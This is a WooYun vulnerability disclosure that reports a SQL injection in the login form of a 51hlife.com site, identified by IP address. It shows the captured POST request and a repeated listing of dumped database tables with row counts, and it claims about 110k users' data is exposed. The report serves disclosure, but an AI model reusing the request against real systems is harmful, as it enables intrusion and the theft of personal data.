当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187040

漏洞标题:好生活某站存在注入泄露大量信息(11w用户)

相关厂商:51hlife.com

漏洞作者: 路人甲

提交时间:2016-03-21 10:50

修复时间:2016-05-05 10:50

公开时间:2016-05-05 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /Login.aspx?doFrom=index HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://202.101.47.116/Login.aspx?doFrom=index
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 202.101.47.116
Content-Length: 496
Pragma: no-cache
Cookie: ASP.NET_SessionId=rqf2vmi1bqg5bjsajntalhm2; ad_play_index=68; IESESSION=alive
Connection: close
__VIEWSTATE=%2FwEPDwUKMTAyNDcwNTk2NQ9kFgJmD2QWAgIDD2QWAgIBD2QWAgIDDxYCHgRUZXh0BUw8c3BhbiBjbGFzcz0ncmVkJz7mgqjpnIDopoHnmbvlvZXlkI7miY3og73ov5vooYzmk43kvZzvvIHor7fnmbvlvZXvvIE8L3NwYW4%2BZGSaI%2Bp%2BNtwfLi30igBXJr5AuilPQdYbZ%2FX4Nnhha8OakA%3D%3D&__EVENTVALIDATION=%2FwEWBAKr1PLcAwLoksmACQKTpbW1BALQl%2FnLCLxAz9%2F%2F8h77uKkAVCl1u1lt4gPTU57SMhPFmOz%2FqsQU&ctl00%24ContentPlaceHolder%24userName=asdasd&ctl00%24ContentPlaceHolder%24passWord=sadasd&ctl00%24ContentPlaceHolder%24BtSave=%E7%99%BB%E5%85%A5

1.png


2.png


至于这个是多少信息,好多表都是数十万的

Database: BGJK
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| BROWSELOG | 65228213 |
| LOG | 6002734 |
| BROWSELOG_BK | 5258329 |
| T_HPP_PERSON_INSURE | 3265887 |
| USERACCOUNTDETAIL | 2370927 |
| T_JS_OPERATING_NEW | 2315658 |
| USERACCOUNTDETAIL_BAK_2016 | 2288436 |
| HC_CLIENTLOG | 2122350 |
| Z_BK_USERACCOUNTDETAIL_2012 | 2009544 |
| USERACCOUNTDETAIL_ARCHIVE | 1672548 |
| Z_BK_T_JS_OPERATING_NEW_2015 | 1590677 |
| Z_BK_USERACCOUNTDETAIL_2015 | 1556540 |
| Z_BK_USERACCOUNTDETAIL_2014 | 1506670 |
| Z_USERACCOUNTDETAIL_1410_BK | 1475764 |
| T_JS_OPERATING_DTL | 1014584 |
| T_JS_OPERATING_DTL_BAK_2016 | 1014584 |
| SENDSMS | 869665 |
| Z_BK_T_JS_OPERATING_NEW_2014 | 796957 |
| Z_BK_T_JS_OPERATING_DTL_2015 | 772989 |
| BMI_INFO | 757456 |
| T_HPP_ITEM_RULE | 540488 |
| HC_T_HPP_ITEM_RULE | 523966 |
| Z_BK_T_JS_OPERATING_DTL_2014 | 479775 |
| LOG_BK | 408842 |
| T_SMS_SEND | 306356 |
| SMS_ORGCOUNT | 298738 |
| SMS_ORGCOUNT_REAL | 298738 |
| T_JS_DATAVALIDATION | 298182 |
| T_JS_STATISTICSDATADTL_JG | 285594 |
| T_JS_S_D_DTL_JG_BK_2016 | 275549 |
| Z_BK_T_JS_SDATADTL_JG_2015 | 202663 |
| T_JS_STATISTICSDATADTL_CG | 188994 |
| T_JS_S_D_DTL_CG_BK_2016 | 182386 |
| T_HPP_USERDETAIL | 180820 |
| Z_BK_T_JS_DATAVALIDATION_2015 | 180266 |
| REPORT_BASIS | 148986 |
| LOG_BGAL | 140058 |
| Z_BK_T_JS_SDATADTL_CG_2015 | 137810 |
| USERICCARD | 115907 |
| USERICCARD_BAK_2016 | 115221 |
| USERINFO | 114938 |
| Z_BK_USERICCARD_2015 | 114329 |
| USERINFO_BAK_2016 | 113450 |
| T_JS_STATISTICSDATAMST | 111548 |
| Z_BK_USERINFO_2015 | 108417 |
| T_JS_S_D_MST_BAK_2016 | 107849 |
| T_JS_STATISTICSD_MST_BAK_2016 | 107849 |
| USERACCOUNT | 102087 |
| Z_BK_T_JS_SDATADTL_JG_2014 | 101558 |
| USERACCOUNT_BAK_2016 | 100588 |
| MOBILEVALIDATION | 97494 |
| Z_BK_USERACCOUNT_2015 | 96023 |
| ITEMBOOKORDER | 89304 |
| Z_BK_USERICCARD_2014 | 86667 |
| Z_BK_USERINFO_2014 | 82302 |
| Z_BK_T_JS_DATAVALIDATION_2014 | 78737 |
| T_SECKILL_USERDETAIL | 75053 |
| Z_BK_USERACCOUNT_2014 | 73840 |
| ORGINFO | 70675 |
| Z_BK_T_JS_SDATADTL_CG_2014 | 68497 |
| T_CONSUMPTIONDATA | 68050 |
| JS_INVOICEMONTH_MXDTL | 67720 |
| JS_INVOICEMONTH_MXDTL_BAK_2016 | 67720 |
| Z_BK_JS_INVOICEM_MXDTL_2015 | 67720 |
| REPORT_BASIS_JS | 64190 |
| T_XT_ORGANIZATION | 63171 |
| PX_SURVEY_EMP | 61410 |
| T_XT_ORGANIZATIONHIERARCHY | 61039 |
| T_HPP_SYS_DEDUCTTIMING | 59687 |
| T_XLZX_REVIEW | 56184 |
| SMS_INTERFACE_DETECTION | 50735 |
| Z_BK_T_JS_SDATAMST_2015 | 50250 |
| Z_BK_T_JS_SDATAMST_2012 | 47554 |
| ORGANIZATIONS | 43939 |
| HC_T_HPP_ITEM_PRICE | 43853 |
| SMS_ASSIGNINFO | 43697 |
| T_HPP_ITEM_PRICE | 43591 |
| DOWNLOADRECORDDTL | 39052 |
| JS_INVOICEMONTH_MX | 38442 |
| JS_INVOICEMONTH_MX_BAK_2016 | 38442 |
| Z_BK_JS_INVOICEMONTH_MX_2015 | 38442 |
| Z_BK_T_HPP_ITEM_PRICE_2015 | 37516 |
| SMS_EMPINFO | 37356 |
| SMS_MOBILE | 37350 |
| SMS_MOBILE_BAK | 37350 |
| ORGINFO_NEW | 35723 |
| QUESTIONNAIRE_DETAIL | 35678 |
| SMS_ORGANIZATIONS | 35181 |
| SMS_ORGANIZATIONS_BAK | 35181 |
| Z_BK_T_JS_SDATAMST_2014 | 29023 |
| T_JS_DATAINTERFACE | 27990 |
| T_CONSUMPTIONDATA_LOG | 27833 |
| T_JS_SETTLEMENTPATTERN | 26518 |
| JS_ORG_BASIS_DATA_MX | 23368 |
| TEMP002 | 23170 |
| TEMP_EMP | 22836 |
| PX_SERVICE | 22588 |
| CHANGEPWDURL | 20263 |
| ITEM_APPRECIATION | 19344 |
| Z_BK_T_JS_SMPATTERN_2015 | 19285 |
| T_OY_GAME | 19011 |
| T_SMS_BATCHPERSON | 15745 |
| Z_BK_T_HPP_ITEM_PRICE_2014 | 15236 |
| Z_BK_T_JS_DATAINTERFACE_2015 | 13857 |
| HC_T_HPP_ITEM | 13308 |
| T_HPP_ITEM | 13148 |
| JS_INVOICEMONTH | 13070 |
| JS_INVOICEMONTH_BAK_2016 | 13070 |
| Z_BK_JS_INVOICEMONTH_2015 | 13070 |
| Z_T_JS_DATAINTERFACE_10_BK | 13070 |
| T_MEMBERMONEYCHANGERECORD | 12995 |
| JS_ORG_BASIS_DATA | 12632 |
| PX_MBBACKUP | 11710 |
| Z_BK_T_HPP_ITEM_2015 | 11448 |
| INNERMAIL | 11001 |
| T_SMS_BATCH | 10832 |
| Z_BK_T_JS_SMPATTERN_2014 | 9504 |
| FRIEND_WEIGHT | 9347 |
| JS_INVOICE | 8694 |
| JS_INVOICE_BAK_2016 | 8694 |
| Z_BK_JS_INVOICE_2015 | 8694 |
| T_SMS_BATCHGROUP | 8284 |
| JS_INVOICE_MX | 8160 |
| JS_INVOICE_MX_BAK_2016 | 8160 |
| Z_BK_JS_INVOICE_MX_2015 | 8160 |
| TRAINAPPLICATION | 7510 |
| TEMP01 | 6937 |
| PX_LOG | 5412 |
| T_HPP_ITEM_BK | 5115 |
| HC_T_HPP_ITEM_BAK | 5045 |
| TRAINTIMETABLE | 5039 |
| SYN_TASK_DAY4ITEMBOOK | 4407 |
| CABLEPOINT | 4100 |
| DX_RTEMP | 3839 |
| Z_BK_T_JS_DATAINTERFACE_2014 | 3265 |
| GENERAL_TEAM | 2607 |
| USERINFOLD | 2556 |
| SYN_TASK_DAY | 2331 |
| USERHEADINFO | 2162 |
| USERHEADINFO | 2162 |
| T_HPP_LESSMSG | 2161 |
| TEMP_SRWE | 2140 |
| ORGSUMMARY_BASIS | 2106 |
| COMPLAINTREMARK | 1972 |
| QUESTIONNAIRE_LIST | 1960 |
| H_SUBJECT_LIST | 1727 |
| T_HPP_USERDETAIL_PRICE | 1551 |
| USERTRUSTEESHIP | 1534 |
| BSE_TEMP | 1510 |
| T_MEMBERCARDINFO | 1510 |
| SYN_TASK_DAY4PUSH | 1388 |
| USER_TICKETSRECOURDINFO | 1377 |
| T_XT_USERINGROUP | 1322 |
| T_JS_DATAINTERFACE_USER | 1298 |
| COMPLAINTS | 1288 |
| TRAINTIMECARD | 1113 |
| JS_TRAINTEAM | 1098 |
| GENERAL_INFO | 990 |
| T_XT_USER | 836 |
| T_HPP_ITEMSET | 835 |
| TRAINTEACHEREVALUATION | 818 |
| HC_NX | 744 |
| TRAINNOTICE | 729 |
| T_SMS_BATCHTEMPORARYPHONE | 720 |
| PERSONAL_FRIEND | 674 |
| PX_PRE_ORDER | 656 |
| T_XT_USER_TEST | 640 |
| USERINROLE | 597 |
| SMS_LOG | 570 |
| TRAINTEAM | 463 |
| ITEM_TEMP2_YN | 452 |
| ANNOUNCEMENTINFO | 443 |
| VENUE | 443 |
| TEMP001 | 372 |
| HC_T_DP_IMAGES | 354 |
| ITEM | 341 |
| BLOG_BLOGMST | 322 |
| Z_BK_VENUE_2015 | 319 |
| DATADICTIONARY | 316 |
| Z_BK_ITEM_2014 | 313 |
| T_JS_OBJECTION | 266 |
| AD_MANAGE | 253 |
| BLOG_READBLOG | 252 |
| VENUE_BACK | 252 |
| ORGANIZATIONSSYNSETTING | 239 |
| T_XLZX_KNOWLEDGE | 235 |
| PLAY_REGISTER | 227 |
| Z_BK_VENUE_2014 | 226 |
| JS_ORG_SETTING | 224 |
| T_JS_OPERATINGCONFIG | 219 |
| HC_T_TXFL_TAGCLASS | 204 |
| VENUEAPPRECIATION | 203 |
| T_TXFL_TAGCLASS | 201 |
| Z_BK_T_JS_OPERATINGCONFIG_2015 | 195 |
| FRIEND_MESSAGE | 187 |
| Z_BK_DATADICTIONARY_2015 | 184 |
| Z_BK_T_JS_OBJECTION_2015 | 184 |
| PX_SURVEY_OPTION | 179 |
| T_XT_SCHEDULEDTASK | 179 |
| Z_BK_DATADICTIONARY_2014 | 164 |
| JS_INSTITUTION | 160 |
| T_JS_OBJECTION_DTL | 160 |
| TRAINTEACHER | 156 |
| USERORDER | 152 |
| SMS_CONFIG | 150 |
| SMS_CONFIG_TMP | 149 |
| T_ITEMPRICEROUND | 149 |
| Z_BK_T_JS_OPERATINGCONFIG_2014 | 144 |
| JS_OPERATIONMANAGEMENTFEE | 128 |
| ITEMWEBBOOK | 123 |
| QUESTIONNAIRE_ANSWERS | 122 |
| PX_HARDWARE | 107 |
| T_MEMBERCARDINFO_BAK | 91 |
| Z_BK_T_JS_OBJECTION_DTL_2015 | 84 |
| T_JKCF_COOKERKNOW | 77 |
| T_XT_GROUP | 74 |
| FRIEND_PHOTOALBUMMASTER | 70 |
| SMS_TEMPLATE | 70 |
| FRIEND_PHOTOALBUMDTL | 69 |
| Z_BK_T_JS_OBJECTION_2014 | 69 |
| T_JS_COSTINGCODE | 66 |
| Z_BK_T_JS_COSTINGCODE_2014 | 66 |
| Z_BK_T_JS_COSTINGCODE_2015 | 66 |
| TEMPDATAVALIDATION | 64 |
| T_SMS_BATCHORGANIZATION | 55 |
| T_JS_MECHANISMTABLE | 51 |
| T_XLZX_TALK_DTL | 48 |
| REGISTRATIONDETAIL | 46 |
| FL_QY_CORPWELFARE | 44 |
| PX_HARDWAREMOD | 44 |
| TRAINNOTICE_BAK | 44 |
| PX_SURVEY_TITLE | 40 |
| QUESTIONNAIRE_SUBJECT | 36 |
| Z_BK_T_JS_MECHANISMTABLE_2015 | 36 |
| T_ALPHAINFO | 33 |
| SYN_TASK_MONTH | 32 |
| T_FIELD | 30 |
| T_XT_SMSTEMPLATE | 29 |
| PX_DTL | 28 |
| T_XL_EVALUATE | 28 |
| T_XT_USERINROLE | 28 |
| Z_BK_T_JS_OBJECTION_DTL_2014 | 28 |
| PLAY_PLACE | 27 |
| T_SECKILL_ITEM | 27 |
| DATATREE | 26 |
| ITEMCLASSIFICATION | 24 |
| T_HPP_BOOKS | 24 |
| Z_BK_ITEMCLASSIFICATION_2014 | 24 |
| Z_BK_ITEMCLASSIFICATION_2015 | 24 |
| Z_BK_T_JS_MECHANISMTABLE_2014 | 24 |
| FL_SH_WELFAREINFO | 23 |
| T_HPP_WEEKEND_TJ | 23 |
| USER_XINHUAESTORE | 23 |
| T_XL_COUNSELING | 22 |
| COMMUNITY_TYPE | 21 |
| RESERVATION | 21 |
| T_ORGINFO | 21 |
| BNA_USER_LOAD | 20 |
| HC_FIRSTVIEWSETTING | 20 |
| ROLES | 20 |
| FL_SH_MERCHANTINFO | 19 |
| MOBILE_VERSION | 19 |
| T_JS_L2ORDER | 16 |
| SERVICE_CERT | 15 |
| FL_YG_ACCOUNT | 14 |
| T_XT_APPENDPARAMETER | 12 |
| PX_HITEGG_SURVEY_AW_WIN | 11 |
| PX_MST | 11 |
| T_ITEMPRICE | 11 |
| COMMUNITY_HOME | 10 |
| FL_YG_CONSUMPTIONDETAIL | 10 |
| PX_EMP | 10 |
| SKL_REPORT | 10 |
| T_STADIUM | 10 |
| T_XLZX_TALK | 10 |
| HC_CLIENTSETTING | 9 |
| T_ITEM | 9 |
| T_STADIUMHIERARCHY | 9 |
| PLAY_NOTICE | 8 |
| T_ADMINUSER | 8 |
| T_GIVEMONEYINFO | 8 |
| TEAM_ACTIVITIES | 8 |
| COMMUNITY_INDEX | 7 |
| FL_QY_WELFARETYPEMAX | 7 |
| H_LIST_MODULE | 7 |
| DOWNLOADRECORD | 5 |
| EXCEPTION_PROCESSING | 5 |
| FRIEND_GROUPS | 5 |
| ITEM_TEMP_YN | 5 |
| PX_HITEGG_SURVEY_AW | 5 |
| T_JS_OPERATINGCONFIG_USER | 5 |
| T_XT_CATEGORY | 5 |
| T_XT_ROLE | 5 |
| VENUE_PLACE | 5 |
| REGISTRATIONINFORMATION | 4 |
| T_HJ_ZF | 4 |
| T_MEMBERINFO | 4 |
| T_MEMBERTYPE | 4 |
| T_SENDADMINSMS | 4 |
| FL_SH_FORECLOSURE | 3 |
| QUESTIONNAIRE_BATCH | 3 |
| SMS_BATCH | 3 |
| HC_BASEDTL | 2 |
| HC_BASEMST | 2 |
| ORDERSETTING | 2 |
| PX_SURVEY | 2 |
| T_XT_PROVIDERACCOUNT | 2 |
| KNOWLEDGECATAGRY | 1 |
| PX_COOPERATION | 1 |
| PX_HITEGG_SURVEY | 1 |
| T_HJ_NAME | 1 |
| T_TXFL_OPENDATE | 1 |
| T_XT_ORGACCOUNTRELEVANCE | 1 |
| T_XT_PROVIDER | 1 |
+--------------------------------+---------+


泄露用户信息

3.png


漏洞证明:

POST /Login.aspx?doFrom=index HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://202.101.47.116/Login.aspx?doFrom=index
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 202.101.47.116
Content-Length: 496
Pragma: no-cache
Cookie: ASP.NET_SessionId=rqf2vmi1bqg5bjsajntalhm2; ad_play_index=68; IESESSION=alive
Connection: close
__VIEWSTATE=%2FwEPDwUKMTAyNDcwNTk2NQ9kFgJmD2QWAgIDD2QWAgIBD2QWAgIDDxYCHgRUZXh0BUw8c3BhbiBjbGFzcz0ncmVkJz7mgqjpnIDopoHnmbvlvZXlkI7miY3og73ov5vooYzmk43kvZzvvIHor7fnmbvlvZXvvIE8L3NwYW4%2BZGSaI%2Bp%2BNtwfLi30igBXJr5AuilPQdYbZ%2FX4Nnhha8OakA%3D%3D&__EVENTVALIDATION=%2FwEWBAKr1PLcAwLoksmACQKTpbW1BALQl%2FnLCLxAz9%2F%2F8h77uKkAVCl1u1lt4gPTU57SMhPFmOz%2FqsQU&ctl00%24ContentPlaceHolder%24userName=asdasd&ctl00%24ContentPlaceHolder%24passWord=sadasd&ctl00%24ContentPlaceHolder%24BtSave=%E7%99%BB%E5%85%A5

1.png


2.png


至于这个是多少信息,好多表都是数十万的

Database: BGJK
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| BROWSELOG | 65228213 |
| LOG | 6002734 |
| BROWSELOG_BK | 5258329 |
| T_HPP_PERSON_INSURE | 3265887 |
| USERACCOUNTDETAIL | 2370927 |
| T_JS_OPERATING_NEW | 2315658 |
| USERACCOUNTDETAIL_BAK_2016 | 2288436 |
| HC_CLIENTLOG | 2122350 |
| Z_BK_USERACCOUNTDETAIL_2012 | 2009544 |
| USERACCOUNTDETAIL_ARCHIVE | 1672548 |
| Z_BK_T_JS_OPERATING_NEW_2015 | 1590677 |
| Z_BK_USERACCOUNTDETAIL_2015 | 1556540 |
| Z_BK_USERACCOUNTDETAIL_2014 | 1506670 |
| Z_USERACCOUNTDETAIL_1410_BK | 1475764 |
| T_JS_OPERATING_DTL | 1014584 |
| T_JS_OPERATING_DTL_BAK_2016 | 1014584 |
| SENDSMS | 869665 |
| Z_BK_T_JS_OPERATING_NEW_2014 | 796957 |
| Z_BK_T_JS_OPERATING_DTL_2015 | 772989 |
| BMI_INFO | 757456 |
| T_HPP_ITEM_RULE | 540488 |
| HC_T_HPP_ITEM_RULE | 523966 |
| Z_BK_T_JS_OPERATING_DTL_2014 | 479775 |
| LOG_BK | 408842 |
| T_SMS_SEND | 306356 |
| SMS_ORGCOUNT | 298738 |
| SMS_ORGCOUNT_REAL | 298738 |
| T_JS_DATAVALIDATION | 298182 |
| T_JS_STATISTICSDATADTL_JG | 285594 |
| T_JS_S_D_DTL_JG_BK_2016 | 275549 |
| Z_BK_T_JS_SDATADTL_JG_2015 | 202663 |
| T_JS_STATISTICSDATADTL_CG | 188994 |
| T_JS_S_D_DTL_CG_BK_2016 | 182386 |
| T_HPP_USERDETAIL | 180820 |
| Z_BK_T_JS_DATAVALIDATION_2015 | 180266 |
| REPORT_BASIS | 148986 |
| LOG_BGAL | 140058 |
| Z_BK_T_JS_SDATADTL_CG_2015 | 137810 |
| USERICCARD | 115907 |
| USERICCARD_BAK_2016 | 115221 |
| USERINFO | 114938 |
| Z_BK_USERICCARD_2015 | 114329 |
| USERINFO_BAK_2016 | 113450 |
| T_JS_STATISTICSDATAMST | 111548 |
| Z_BK_USERINFO_2015 | 108417 |
| T_JS_S_D_MST_BAK_2016 | 107849 |
| T_JS_STATISTICSD_MST_BAK_2016 | 107849 |
| USERACCOUNT | 102087 |
| Z_BK_T_JS_SDATADTL_JG_2014 | 101558 |
| USERACCOUNT_BAK_2016 | 100588 |
| MOBILEVALIDATION | 97494 |
| Z_BK_USERACCOUNT_2015 | 96023 |
| ITEMBOOKORDER | 89304 |
| Z_BK_USERICCARD_2014 | 86667 |
| Z_BK_USERINFO_2014 | 82302 |
| Z_BK_T_JS_DATAVALIDATION_2014 | 78737 |
| T_SECKILL_USERDETAIL | 75053 |
| Z_BK_USERACCOUNT_2014 | 73840 |
| ORGINFO | 70675 |
| Z_BK_T_JS_SDATADTL_CG_2014 | 68497 |
| T_CONSUMPTIONDATA | 68050 |
| JS_INVOICEMONTH_MXDTL | 67720 |
| JS_INVOICEMONTH_MXDTL_BAK_2016 | 67720 |
| Z_BK_JS_INVOICEM_MXDTL_2015 | 67720 |
| REPORT_BASIS_JS | 64190 |
| T_XT_ORGANIZATION | 63171 |
| PX_SURVEY_EMP | 61410 |
| T_XT_ORGANIZATIONHIERARCHY | 61039 |
| T_HPP_SYS_DEDUCTTIMING | 59687 |
| T_XLZX_REVIEW | 56184 |
| SMS_INTERFACE_DETECTION | 50735 |
| Z_BK_T_JS_SDATAMST_2015 | 50250 |
| Z_BK_T_JS_SDATAMST_2012 | 47554 |
| ORGANIZATIONS | 43939 |
| HC_T_HPP_ITEM_PRICE | 43853 |
| SMS_ASSIGNINFO | 43697 |
| T_HPP_ITEM_PRICE | 43591 |
| DOWNLOADRECORDDTL | 39052 |
| JS_INVOICEMONTH_MX | 38442 |
| JS_INVOICEMONTH_MX_BAK_2016 | 38442 |
| Z_BK_JS_INVOICEMONTH_MX_2015 | 38442 |
| Z_BK_T_HPP_ITEM_PRICE_2015 | 37516 |
| SMS_EMPINFO | 37356 |
| SMS_MOBILE | 37350 |
| SMS_MOBILE_BAK | 37350 |
| ORGINFO_NEW | 35723 |
| QUESTIONNAIRE_DETAIL | 35678 |
| SMS_ORGANIZATIONS | 35181 |
| SMS_ORGANIZATIONS_BAK | 35181 |
| Z_BK_T_JS_SDATAMST_2014 | 29023 |
| T_JS_DATAINTERFACE | 27990 |
| T_CONSUMPTIONDATA_LOG | 27833 |
| T_JS_SETTLEMENTPATTERN | 26518 |
| JS_ORG_BASIS_DATA_MX | 23368 |
| TEMP002 | 23170 |
| TEMP_EMP | 22836 |
| PX_SERVICE | 22588 |
| CHANGEPWDURL | 20263 |
| ITEM_APPRECIATION | 19344 |
| Z_BK_T_JS_SMPATTERN_2015 | 19285 |
| T_OY_GAME | 19011 |
| T_SMS_BATCHPERSON | 15745 |
| Z_BK_T_HPP_ITEM_PRICE_2014 | 15236 |
| Z_BK_T_JS_DATAINTERFACE_2015 | 13857 |
| HC_T_HPP_ITEM | 13308 |
| T_HPP_ITEM | 13148 |
| JS_INVOICEMONTH | 13070 |
| JS_INVOICEMONTH_BAK_2016 | 13070 |
| Z_BK_JS_INVOICEMONTH_2015 | 13070 |
| Z_T_JS_DATAINTERFACE_10_BK | 13070 |
| T_MEMBERMONEYCHANGERECORD | 12995 |
| JS_ORG_BASIS_DATA | 12632 |
| PX_MBBACKUP | 11710 |
| Z_BK_T_HPP_ITEM_2015 | 11448 |
| INNERMAIL | 11001 |
| T_SMS_BATCH | 10832 |
| Z_BK_T_JS_SMPATTERN_2014 | 9504 |
| FRIEND_WEIGHT | 9347 |
| JS_INVOICE | 8694 |
| JS_INVOICE_BAK_2016 | 8694 |
| Z_BK_JS_INVOICE_2015 | 8694 |
| T_SMS_BATCHGROUP | 8284 |
| JS_INVOICE_MX | 8160 |
| JS_INVOICE_MX_BAK_2016 | 8160 |
| Z_BK_JS_INVOICE_MX_2015 | 8160 |
| TRAINAPPLICATION | 7510 |
| TEMP01 | 6937 |
| PX_LOG | 5412 |
| T_HPP_ITEM_BK | 5115 |
| HC_T_HPP_ITEM_BAK | 5045 |
| TRAINTIMETABLE | 5039 |
| SYN_TASK_DAY4ITEMBOOK | 4407 |
| CABLEPOINT | 4100 |
| DX_RTEMP | 3839 |
| Z_BK_T_JS_DATAINTERFACE_2014 | 3265 |
| GENERAL_TEAM | 2607 |
| USERINFOLD | 2556 |
| SYN_TASK_DAY | 2331 |
| USERHEADINFO | 2162 |
| USERHEADINFO | 2162 |
| T_HPP_LESSMSG | 2161 |
| TEMP_SRWE | 2140 |
| ORGSUMMARY_BASIS | 2106 |
| COMPLAINTREMARK | 1972 |
| QUESTIONNAIRE_LIST | 1960 |
| H_SUBJECT_LIST | 1727 |
| T_HPP_USERDETAIL_PRICE | 1551 |
| USERTRUSTEESHIP | 1534 |
| BSE_TEMP | 1510 |
| T_MEMBERCARDINFO | 1510 |
| SYN_TASK_DAY4PUSH | 1388 |
| USER_TICKETSRECOURDINFO | 1377 |
| T_XT_USERINGROUP | 1322 |
| T_JS_DATAINTERFACE_USER | 1298 |
| COMPLAINTS | 1288 |
| TRAINTIMECARD | 1113 |
| JS_TRAINTEAM | 1098 |
| GENERAL_INFO | 990 |
| T_XT_USER | 836 |
| T_HPP_ITEMSET | 835 |
| TRAINTEACHEREVALUATION | 818 |
| HC_NX | 744 |
| TRAINNOTICE | 729 |
| T_SMS_BATCHTEMPORARYPHONE | 720 |
| PERSONAL_FRIEND | 674 |
| PX_PRE_ORDER | 656 |
| T_XT_USER_TEST | 640 |
| USERINROLE | 597 |
| SMS_LOG | 570 |
| TRAINTEAM | 463 |
| ITEM_TEMP2_YN | 452 |
| ANNOUNCEMENTINFO | 443 |
| VENUE | 443 |
| TEMP001 | 372 |
| HC_T_DP_IMAGES | 354 |
| ITEM | 341 |
| BLOG_BLOGMST | 322 |
| Z_BK_VENUE_2015 | 319 |
| DATADICTIONARY | 316 |
| Z_BK_ITEM_2014 | 313 |
| T_JS_OBJECTION | 266 |
| AD_MANAGE | 253 |
| BLOG_READBLOG | 252 |
| VENUE_BACK | 252 |
| ORGANIZATIONSSYNSETTING | 239 |
| T_XLZX_KNOWLEDGE | 235 |
| PLAY_REGISTER | 227 |
| Z_BK_VENUE_2014 | 226 |
| JS_ORG_SETTING | 224 |
| T_JS_OPERATINGCONFIG | 219 |
| HC_T_TXFL_TAGCLASS | 204 |
| VENUEAPPRECIATION | 203 |
| T_TXFL_TAGCLASS | 201 |
| Z_BK_T_JS_OPERATINGCONFIG_2015 | 195 |
| FRIEND_MESSAGE | 187 |
| Z_BK_DATADICTIONARY_2015 | 184 |
| Z_BK_T_JS_OBJECTION_2015 | 184 |
| PX_SURVEY_OPTION | 179 |
| T_XT_SCHEDULEDTASK | 179 |
| Z_BK_DATADICTIONARY_2014 | 164 |
| JS_INSTITUTION | 160 |
| T_JS_OBJECTION_DTL | 160 |
| TRAINTEACHER | 156 |
| USERORDER | 152 |
| SMS_CONFIG | 150 |
| SMS_CONFIG_TMP | 149 |
| T_ITEMPRICEROUND | 149 |
| Z_BK_T_JS_OPERATINGCONFIG_2014 | 144 |
| JS_OPERATIONMANAGEMENTFEE | 128 |
| ITEMWEBBOOK | 123 |
| QUESTIONNAIRE_ANSWERS | 122 |
| PX_HARDWARE | 107 |
| T_MEMBERCARDINFO_BAK | 91 |
| Z_BK_T_JS_OBJECTION_DTL_2015 | 84 |
| T_JKCF_COOKERKNOW | 77 |
| T_XT_GROUP | 74 |
| FRIEND_PHOTOALBUMMASTER | 70 |
| SMS_TEMPLATE | 70 |
| FRIEND_PHOTOALBUMDTL | 69 |
| Z_BK_T_JS_OBJECTION_2014 | 69 |
| T_JS_COSTINGCODE | 66 |
| Z_BK_T_JS_COSTINGCODE_2014 | 66 |
| Z_BK_T_JS_COSTINGCODE_2015 | 66 |
| TEMPDATAVALIDATION | 64 |
| T_SMS_BATCHORGANIZATION | 55 |
| T_JS_MECHANISMTABLE | 51 |
| T_XLZX_TALK_DTL | 48 |
| REGISTRATIONDETAIL | 46 |
| FL_QY_CORPWELFARE | 44 |
| PX_HARDWAREMOD | 44 |
| TRAINNOTICE_BAK | 44 |
| PX_SURVEY_TITLE | 40 |
| QUESTIONNAIRE_SUBJECT | 36 |
| Z_BK_T_JS_MECHANISMTABLE_2015 | 36 |
| T_ALPHAINFO | 33 |
| SYN_TASK_MONTH | 32 |
| T_FIELD | 30 |
| T_XT_SMSTEMPLATE | 29 |
| PX_DTL | 28 |
| T_XL_EVALUATE | 28 |
| T_XT_USERINROLE | 28 |
| Z_BK_T_JS_OBJECTION_DTL_2014 | 28 |
| PLAY_PLACE | 27 |
| T_SECKILL_ITEM | 27 |
| DATATREE | 26 |
| ITEMCLASSIFICATION | 24 |
| T_HPP_BOOKS | 24 |
| Z_BK_ITEMCLASSIFICATION_2014 | 24 |
| Z_BK_ITEMCLASSIFICATION_2015 | 24 |
| Z_BK_T_JS_MECHANISMTABLE_2014 | 24 |
| FL_SH_WELFAREINFO | 23 |
| T_HPP_WEEKEND_TJ | 23 |
| USER_XINHUAESTORE | 23 |
| T_XL_COUNSELING | 22 |
| COMMUNITY_TYPE | 21 |
| RESERVATION | 21 |
| T_ORGINFO | 21 |
| BNA_USER_LOAD | 20 |
| HC_FIRSTVIEWSETTING | 20 |
| ROLES | 20 |
| FL_SH_MERCHANTINFO | 19 |
| MOBILE_VERSION | 19 |
| T_JS_L2ORDER | 16 |
| SERVICE_CERT | 15 |
| FL_YG_ACCOUNT | 14 |
| T_XT_APPENDPARAMETER | 12 |
| PX_HITEGG_SURVEY_AW_WIN | 11 |
| PX_MST | 11 |
| T_ITEMPRICE | 11 |
| COMMUNITY_HOME | 10 |
| FL_YG_CONSUMPTIONDETAIL | 10 |
| PX_EMP | 10 |
| SKL_REPORT | 10 |
| T_STADIUM | 10 |
| T_XLZX_TALK | 10 |
| HC_CLIENTSETTING | 9 |
| T_ITEM | 9 |
